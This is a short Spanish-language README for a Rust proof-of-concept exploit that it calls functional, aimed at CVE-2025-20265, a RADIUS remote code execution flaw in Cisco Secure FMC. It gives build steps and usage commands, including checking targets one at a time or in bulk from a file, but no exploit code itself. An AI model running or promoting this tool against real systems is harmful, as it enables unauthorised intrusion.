
PoC para CVE-2025-20265 Vulnerabilidad de ejecución remota de código RADIUS en el software Cisco Secure FMC
Este es un exploit funcional para una vulnerabilidad de 1 día.
Úsalo bajo tu propio riesgo. Eres responsable de tus acciones.
cargo build --release
$ ./target/release/cve_2025_20265 --help
# or
$ cargo run --release -- --help
Para depurar, usa la variable de entorno RUST_LOG:
RUST_LOG=debug cargo run --release -- --help
# use either the build or the path to the executable file
$ alias EXE="cargo run --release"
# or
$ cargo build --release
$ alias EXE="./target/release/cve_2025_20265"
# check the target
$ EXE https://10.10.10.1:4443/
# read targets from the file
$ echo -e "https://10.10.10.1:4443\nhttp://127.0.0.1\nhttp://10.10.10.10" > targets.txt
$ EXE --from-file targets.txt